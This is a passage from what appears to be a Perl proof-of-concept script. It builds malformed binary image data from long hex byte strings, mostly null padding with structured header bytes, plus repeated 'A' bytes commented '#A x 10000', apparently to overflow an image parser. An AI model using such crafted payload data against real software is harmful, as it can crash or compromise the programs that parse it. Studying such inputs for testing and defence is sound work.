+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x1B\xA7\x62\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xD5\xF5\x3C\x00". + "\xE1\x00\x00\x00\x00\x00\x00\xE1\x00\xFB\x00\x00\x00\x00\xFB\x00\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5\xF5\x00". + "\x3C\x00\xE3\x00\x00\x00\x00\x00\x00\xE3\x00\xFB\x00\x00\x00\x00\xFB\x00\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5". + "\xF5\xF5\x00\x00\x0A\x2D\xF4\xA6\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\xE4\xF4\x1E\x00\xFE\x00\x00\x00\x00\x00\x00\xFE\x00\xF3". + "\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5\x00\x00\xF4\x00\x00\xF4\xF4\x00\x1E\x00\xFF\x00\x00\x00\x00\x00\x00\xFF". + "\x00\xF3\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5\x00\x00\xF4\x00\x00\xF4\xF4\xF4\x00\x00\x0C\x36\x53\xC4\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x99\x00\xBD\x00\x52\x00\x37\x55\x00\x8C\x00\x41\x00\x6E\xA0\x5E\x50\x54\xF0\x0A\x2D\xE7\x3F\x05\xE1". + "\x44\x81\x4A\xF1\x98\x3F\x60\xCE\x2A\xC7\x64\x7B\xFF\x5C\x34\x12\x5A\xFC\xF1\x18\xFF\xED\x46\x2E\x75\xE6\x00\x60\x00\xAD\x00\xA5". + "\x00\x2B\xB6\x00\x4F\x00\xB6\x00\xB8\x55\xAA\xA4\xA0\xF1\xB3\xDA\xE3\x55\x15\xAC\x5B\x97\x6F\x33\xF3\xCE\x9C\xCF\xDE\xC9\x90\x68". 
+ "\x46\x5D\x97\x05\x59\x0C\x75\xE7\x02\xEC\x1E\x29\x4C\x12\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x32\x01\x22\x00". + "\x20\x00\x00\x00\x00\x00\x00\x20\x00\x08\x00\x00\x00\x00\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01\x01\x00". + "\x22\x00\x1C\x00\x00\x00\x00\x00\x00\x1C\x00\x08\x00\x00\x00\x00\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01". + "\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x75\xFA". + "\xE7\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xD7\xF5\x3C\x00\xCB\x00\x00\x00\x00\x00\x00\xCB\x00\xFB\x00\x00\x00\x00\xFB\x00". + "\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5\xF5\x00\x3C\x00\xE3\x00\x00\x00\x00\x00\x00\xE3\x00\xFB\x00\x00\x00\x00". + "\xFB\x00\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5\xF5\xF5\x00\x00\x9F\x13\x34\xC5\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\xF5\xE5\xF4\x1E\x00\xEB\x00\x00\x00\x00\x00\x00\xEB\x00\xF3\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5\x00\x00". + "\xF4\x00\x00\xF4\xF4\x00\x1E\x00\xFF\x00\x00\x00\x00\x00\x00\xFF\x00\xF3\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5". 
+ "\x00\x00\xF4\x00\x00\xF4\xF4\xF4\x00\x00\xEA\xE9\xD3\x86\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\x00\xBD\x00\x52\x00\x37\x55\x00". + "\x8C\x00\x41\x00\x6E\xA0\x5E\x50\x54\xF0\x0A\x2D\x9C\xB3\x47\x8B\xFE\xBC\xC9\x2A\x98\x3F\x60\xCE\x2A\xC7\x64\xE4\xFF\x9D\x34\x4C". + "\x00\xFC\xDC\x18\x27\xED\x9F\x2E\x03\xE6\x00\x60\x00\xAD\x00\xA5\x00\x2B\xB6\x00\x4F\x00\xB6\x00\xB8\x55\xAA\xA4\xA0\xF1\xB3\xDA". + "\xD8\xF8\xE4\x44\xF4\xD6\x0A\x37\xF3\xCE\x9C\xCF\xDE\xC9\x90\xDD\x46\x89\x97\x64\x29\x0C\x4D\xE7\xE7\xEC\xC6\x29\x39\x12\x00\xFF". + "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x33\x01"."\x41" x 8; + #A x 10000 +my $img_data4 = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + 